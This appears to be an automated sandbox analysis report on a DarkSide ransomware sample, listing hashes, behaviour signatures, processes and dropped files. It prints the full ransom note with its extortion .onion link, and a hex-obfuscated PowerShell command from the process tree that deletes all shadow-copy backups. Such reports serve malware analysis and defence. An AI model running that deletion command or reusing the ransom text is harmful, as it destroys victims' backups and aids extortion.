Overview

overview

10

Static

static

3

acer.exe

windows10-2004-x64

10

151fbd6c29...d5.exe

windows10-2004-x64

10

156335b95b...73.dll

windows10-2004-x64

10

8cfd289118...bc.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    105s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/04/2025, 04:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe

  • Size

    59KB

  • MD5

    04fde4340cc79cd9e61340d4c1e8ddfb

  • SHA1

    88fc623483f7ffe57f986ed10789e6723083fcd8

  • SHA256

    8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc

  • SHA512

    105ddfb8bbfedc8460fb1e6d26c6cd02ea81bfdc12a196c1c2f8e52bc73faf03a688339b4c231ab5b5b3885f2ad248115c32c95fc64e84462a16c3e237e6fc9c

  • SSDEEP

    768:TTjagICPhDt3bS4nyz2CuwSbV5dNcxGV1yldoZrY23W5o:BpDtG4nMpboDTV1ylVZ5

Score
10/10
darksidecredential_accessdiscoveryexecutionransomwarespywarestealer

Malware Config

Extracted

Path

C:\Recovery\WindowsRE\README.f2850324.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/GM0CG8TNZ83ZPUD15TL76BLDCG0ST24TR6NXG1J2AVXSKF8KS4KFIIN2ON5GRWD4 When you open our website, put the following data in the input form: Key: lsJTyyTnzJlGQ1I6sfwV6oVcXaRynwN6mWphA7BKXEDIHJcDlhNNHsrxlkpggRChK2nQ7wP0sknJvl37lbqElTopkUywK3QnfJFmqDBSCmFISeWSudjgwxB4kKSp7h4VySHeu4LmDiZXTAh1dbZHWxTtZ0bA6PhCoDrbGkctY4rucITW4IdYUZJC8d2B7SFnr5EA7EoRkajrZW54brM5Kgwqsz67qzH6Hk0Vr3EDcnGzNjGQBapJczIWkgPtMCJdTkeemQ34XH7wawXu3eOGV3uJlBZNoSuaxtDHMGApS8EWsUXhafMW8WxFLAPLCo6pdm7MLcLsVDp9iBXU1sLv2KkGyUJbO0KOmom9f1JREuidviHRfsndEgMFBAjyq5v4VEIraiioAbtWM7eecYaXPVt3rolsBi8mtjxLOpFj73NPPitoIDxBNfHGzXxvRTXi06Pjx9pRnAtjIqoq5wovnHa8uBel8nq8yDJTk7NWdGdsv3yVwV2TmBin7OvFqHN9lweFNJyuziKCVGEtSaglUNudMmpFnNObGlhfh58jQsrQiQZ2d3AOFsi !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/GM0CG8TNZ83ZPUD15TL76BLDCG0ST24TR6NXG1J2AVXSKF8KS4KFIIN2ON5GRWD4

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

    ransomwaredarkside
  • Darkside family
    darkside
  • Renames multiple (149) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

    credential_accessstealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Control Panel 1 IoCs
    defense_evasion
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe
    "C:\Users\Admin\AppData\Local\Temp\8cfd28911878af048fb96b6cc0b9da770542576d5c2b20b193c3cfc4bde4d3bc.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • System Location Discovery: System Language Discovery
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4036
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4808
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:5304

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Recovery\WindowsRE\README.f2850324.TXT
    Filesize

    1KB

    MD5

    6f01b410c20010de920706c44a01d4dd

    SHA1

    9788131507b7164647d996dc03dfceb2818107e8

    SHA256

    c0b5f7c6add9a723683e5e619655ac92b412264e48854787f7f903842bec63c8

    SHA512

    fa832beb2b7c50b52942f5997033938e2c5adc27e78af8ee52a780c6c98145a8008053b17047d527a6d4844361676f7571521834750046d95977c41785bec421

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    556084f2c6d459c116a69d6fedcc4105

    SHA1

    633e89b9a1e77942d822d14de6708430a3944dbc

    SHA256

    88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

    SHA512

    0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    9932e71c424683360c189912b677a1f3

    SHA1

    0895176d5b630aee675ce2ec0abf90c78063975b

    SHA256

    500fbadc6a59f5bfa355dc38a3f467352c793872dd6324cb34ee0aa933798c0b

    SHA512

    9fdd79878ad74336e723ff8d84f65f2c1c0ca6dc4af6ad35f02bcd3c740ff493fe4affa766065733d30cf9d6f90b56a6934898648f9c31f3af761cb1cf9dab74

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s1e15tdg.w5s.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/4808-10-0x00007FF9265F0000-0x00007FF9268B9000-memory.dmp

    Filesize

    2.8MB

    Download

  • memory/4808-9-0x00007FF9265F0000-0x00007FF9268B9000-memory.dmp

    Filesize

    2.8MB

    Download

  • memory/4808-20-0x000001F046920000-0x000001F046942000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4808-21-0x00007FF9265F0000-0x00007FF9268B9000-memory.dmp

    Filesize

    2.8MB

    Download

  • memory/4808-24-0x00007FF9265F0000-0x00007FF9268B9000-memory.dmp

    Filesize

    2.8MB

    Download